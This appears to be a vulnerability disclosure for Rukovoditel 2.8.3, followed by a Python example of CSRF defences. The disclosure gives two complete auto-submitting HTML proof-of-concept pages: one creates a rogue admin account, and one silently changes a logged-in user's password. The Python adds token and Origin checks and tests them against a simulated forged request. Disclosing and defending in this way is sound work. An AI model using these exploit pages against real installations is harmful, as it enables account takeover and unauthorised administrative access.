The official GitHub repository of the project is https://github.com/Rukovoditel/Rukovoditel, but it has not been updated for a long time. The source code of the affected version (2.8.3) can be downloaded from: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_2.8.3.zip/download
Vulnerability description
- An attacker may exploit the CSRF vulnerability to add a user with admin privileges. Process: (1) The admin logs in to their own account with valid credentials. (2) The adversary crafts the following web page, which creates a user with username "admin2" and password "admin2", and hosts it online. The page auto-submits its forms on load; neither request carries an anti-CSRF token, so the browser attaches the admin's session cookie and the server accepts the requests as the admin's own.
<html>
<head>
<title>CSRF add admin user</title>
</head>
<body onload="javascript:fireForms()">
<script type="text/javascript">
function fireForms()
{
var count = 2;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<H2>Cross Site Request Forgery</H2>
<!-- form1 comes first in the DOM, so fireForms() submits it first: a POST to the users/validate_form endpoint -->
<form method="POST" name="form1" action="http://localhost/rukovoditel/index.php?module=users/validate_form">
<input type="hidden" name="username" value="admin"/>
<input type="hidden" name="useremail" value="admin@admin.com"/>
</form>
<!-- form0 is submitted second: the items/&action=save request that creates the user "admin2" with password "admin2"; no CSRF token field is required -->
<form method="POST" name="form0" action="http://localhost/rukovoditel/index.php?module=items/&action=save">
<input type="hidden" name="path" value="1"/>
<input type="hidden" name="redirect_to" value=""/>
<input type="hidden" name="parent_item_id" value="0"/>
<input type="hidden" name="fields[5]" value="1"/>
<input type="hidden" name="fields[14]" value="default"/>
<input type="hidden" name="fields[6]" value="0"/>
<input type="hidden" name="fields[12]" value="admin2"/>
<input type="hidden" name="password" value="admin2"/>
<input type="hidden" name="fields[7]" value="admin2"/>
<input type="hidden" name="fields[8]" value="lastname"/>
<input type="hidden" name="fields[10]" value="lastname"/>
<input type="hidden" name="fields[9]" value="admin2@admin.com"/>
<input type="hidden" name="fields[13]" value="english.php"/>
</form>
</body>
</html>
(3) Once the logged-in admin visits this page, the browser submits the forms with the admin's session cookie, and a new user with username "admin2" and password "admin2" is created.
- An attacker may exploit the CSRF vulnerability to change the admin's password. Process: (1) The admin logs in to their own account with valid credentials. (2) The adversary crafts the following web page, which sets a new password ("newpassword"), and hosts it online. The change_password endpoint only requires that the new password and its confirmation match; it does not require the current password or a CSRF token.
<html>
<head>
<title>CSRF change password</title>
</head>
<body onload="javascript:fireForms()">
<script type="text/javascript">
function fireForms()
{
var count = 1;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<H2>Cross Site Request Forgery (Edit Existing Admin details)</H2>
<!-- a single POST to the change_password endpoint; the victim's session cookie decides whose password is changed -->
<form method="POST" name="form0" action="http://localhost/rukovoditel/index.php?module=users/change_password&action=change">
<input type="hidden" name="password_new" value="newpassword"/>
<input type="hidden" name="password_confirmation" value="newpassword"/>
</form>
</body>
</html>
(3) Any logged-in user (including the admin) who visits this page has their password changed to "newpassword".
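Both PoCs above work for the same reason: the state-changing POST handlers accept any request that arrives with a valid session cookie, and the browser attaches that cookie to a cross-site form post. The following Python is an added example (not Rukovoditel code) of the server-side check that closes this gap: a per-session synchronizer token embedded in every rendered form and verified on submit, with an Origin/Referer comparison as a second layer, applied to a stand-in for the change_password handler. The Request and session objects, the site origin http://localhost, the attacker host attacker.example and the handler names are assumptions made for the example.

```python
# Added example (not Rukovoditel code): synchronizer-token CSRF protection for
# state-changing POST handlers such as users/change_password&action=change.
# The Request/session shapes below are assumed for the demonstration.
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlsplit

SITE_ORIGIN = "http://localhost"   # assumed: origin the application is served from


@dataclass
class Request:
    method: str
    headers: dict
    form: dict
    session: dict = field(default_factory=dict)  # server-side session behind the cookie


def issue_csrf_token(session: dict) -> str:
    """Create a per-session token; the app must embed it in every form it renders."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def request_origin(headers: dict):
    """Origin the browser claims the request came from (Origin, else Referer)."""
    origin = headers.get("Origin")
    if origin:
        return origin.rstrip("/")
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        return f"{parts.scheme}://{parts.netloc}"
    return None


def csrf_check(req: Request, site_origin: str = SITE_ORIGIN):
    """Return (ok, reason): accept only same-origin POSTs carrying the session token."""
    if req.method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"          # valid only if GET never changes state
    origin = request_origin(req.headers)
    if origin is None:
        return False, "no Origin or Referer header"
    if origin.lower() != site_origin.lower():
        return False, f"cross-site request from {origin}"
    expected = req.session.get("csrf_token")
    supplied = req.form.get("csrf_token")
    if not expected or not supplied or not hmac.compare_digest(
        expected.encode(), str(supplied).encode()
    ):
        return False, "missing or mismatched csrf_token"
    return True, "ok"


def change_password_vulnerable(req: Request) -> bool:
    """What the unpatched handler effectively does: trust any authenticated POST."""
    if req.form.get("password_new") == req.form.get("password_confirmation"):
        req.session["password"] = req.form["password_new"]
        return True
    return False


def change_password_hardened(req: Request) -> bool:
    """Same handler behind the CSRF check."""
    ok, _reason = csrf_check(req)
    return ok and change_password_vulnerable(req)


# Constructed requests. The forged one is what a browser sends for the second
# PoC page from the attacker's site (assumed host attacker.example); the
# legitimate one comes from the app's own form and carries the session token.
def forged_request(session: dict) -> Request:
    return Request(
        method="POST",
        headers={"Origin": "http://attacker.example"},
        form={"password_new": "newpassword", "password_confirmation": "newpassword"},
        session=session,
    )


def legitimate_request(session: dict) -> Request:
    token = session.get("csrf_token") or issue_csrf_token(session)
    return Request(
        method="POST",
        headers={"Origin": SITE_ORIGIN},
        form={"password_new": "newpassword", "password_confirmation": "newpassword",
              "csrf_token": token},
        session=session,
    )


def demo() -> dict:
    """Run the forged and legitimate requests against both handlers."""
    admin_session = {"user": "admin", "password": "original"}
    issue_csrf_token(admin_session)
    results = {"vulnerable_forged": change_password_vulnerable(forged_request(admin_session))}
    admin_session["password"] = "original"      # reset after the successful attack
    results["hardened_forged"] = change_password_hardened(forged_request(admin_session))
    results["password_after_forged"] = admin_session["password"]
    results["hardened_legit"] = change_password_hardened(legitimate_request(admin_session))
    results["password_after_legit"] = admin_session["password"]
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Running it shows the forged request from the second PoC succeeding against the vulnerable handler and being rejected by the hardened one, while a same-origin request that carries the token still goes through. The origin comparison is defense in depth only, since some clients omit both headers; the token is what the fix rests on. Setting the session cookie with SameSite=Lax would additionally stop the top-level cross-site POST both PoC pages rely on, and the change-password handler should also demand the current password so a forged or hijacked session cannot silently replace it.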